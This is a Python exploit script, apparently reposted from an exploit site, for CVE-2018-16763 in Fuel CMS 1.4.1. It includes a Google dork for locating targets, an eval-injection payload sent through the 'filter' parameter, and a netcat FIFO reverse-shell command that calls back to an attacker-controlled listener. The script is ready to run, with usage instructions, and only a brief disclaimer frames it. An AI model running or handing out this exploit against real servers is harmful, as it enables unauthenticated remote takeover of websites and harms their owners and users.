Share
## https://sploitus.com/exploit?id=PACKETSTORM:218426
#!/usr/bin/python3
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (RCE) via filter parameter
# Google Dork: intitle:"Welcome to Fuel CMS" inurl:/fuel/
# Date: 2025-04-05
# Exploit Author: Suraj Gupta (0xmrsecurity)
# Author GitHub: https://github.com/0xmrsecurity
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: 1.4.1
# Tested on: Kali Linux 2024.1, Ubuntu 20.04
# CVE: CVE-2018-16763
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2018-16763
# https://github.com/0xmrsecurity/Public_Poc/tree/main/CVE-2018-16763
#
# Description:
# Fuel CMS version 1.4.1 is vulnerable to Remote Code Execution (RCE) via
# the 'filter' parameter in /fuel/pages/select/. The parameter is passed
# unsanitized to PHP's eval() function, allowing an unauthenticated attacker
# to inject arbitrary PHP code and achieve OS-level command execution.
# Exploitation delivers a reverse shell to an attacker-controlled listener.
#
# Vulnerable Endpoint:
# GET /fuel/pages/select/?filter=[payload]
#
# Payload Technique:
# '+pi(print($a='system'))+$a('OS_COMMAND')+'
# The filter value is URL-encoded and injected into an eval() context.
#
# Impact:
# Unauthenticated Remote Code Execution โ complete server compromise.
# CVSS v3 Base Score: 9.8 (Critical)
#
# Usage:
# Step 1: Start a netcat listener on your attacker machine:
# nc -lvnp <PORT>
#
# Step 2: Run the exploit:
# python3 CVE-2018-16763.py --ip <TARGET_IP> --rhost <YOUR_IP> --rport <YOUR_PORT>
#
# Example:
# python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444
#
# Disclaimer:
# This exploit is for authorized penetration testing and educational purposes only.
# Use only on systems you own or have explicit written permission to test.
# The author is not responsible for any misuse or damage caused by this tool.
import requests
import urllib.parse
import argparse
import sys
BANNER = """
_____ _ _ ______ _ _____ __ __ _____ ____ _____ ______
| ___| | | || ____| | / ____| \/ |/ ____| | _ \ / ____| ____|
| |_ | | | || |__ | | | | | \ / | (___ | |_) | | | |__
| _| | | | || __| | | | | | |\/| |\___ \ | _ <| | | __|
| | | |_| || |____| |____| |____| | | |____) | | |_) | |____| |____
|_| \___/ |______|______|\_____|_| |_|_____/ |____/ \_____|______|
CVE-2018-16763 | Fuel CMS 1.4.1 - Unauthenticated RCE
Author: Suraj Gupta | github.com/0xmrsecurity
"""
def build_payload(rhost, rport):
shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {rhost} {rport} >/tmp/f"
encoded = urllib.parse.quote(shell)
return encoded
def exploit(target_ip, rhost, rport):
print(BANNER)
print(f"[*] Target : http://{target_ip}")
print(f"[*] Callback : {rhost}:{rport}")
print(f"[*] CVE : CVE-2018-16763")
print(f"[*] Affected : Fuel CMS v1.4.1")
print("-" * 55)
payload = build_payload(rhost, rport)
url = (
f"http://{target_ip}/fuel/pages/select/"
f"?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29"
f"%2b%24%61%28%27{payload}%27%29%2b%27"
)
print(f"[+] Sending exploit payload to target...")
print(f"[!] Start your listener now: nc -lvnp {rport}")
print("-" * 55)
try:
r = requests.get(url, timeout=8)
print(f"[+] Request sent โ HTTP {r.status_code}")
if r.status_code == 200:
print(f"[+] Payload delivered successfully.")
print(f"[+] Check your listener on {rhost}:{rport} for reverse shell.")
else:
print(f"[-] Unexpected response code: {r.status_code}")
print(f"[*] Target may be patched or unreachable.")
except requests.exceptions.ConnectionError:
print("[-] Connection failed โ target may be down or IP is incorrect.")
sys.exit(1)
except requests.exceptions.Timeout:
print("[+] Request timed out โ this may indicate the shell connected!")
print(f"[+] Check your listener on {rhost}:{rport}")
except Exception as e:
print(f"[-] Unexpected error: {e}")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(
prog='CVE-2018-16763',
description='Fuel CMS 1.4.1 โ Unauthenticated Remote Code Execution',
epilog='Example: python3 CVE-2018-16763.py --ip 192.168.1.10 --rhost 192.168.1.5 --rport 4444'
)
parser.add_argument('--ip', required=True, help='Target IP running Fuel CMS 1.4.1')
parser.add_argument('--rhost', required=True, help='Your attacker/listener IP')
parser.add_argument('--rport', required=True, help='Your attacker/listener port')
args = parser.parse_args()
exploit(args.ip, args.rhost, args.rport)
if __name__ == '__main__':
main()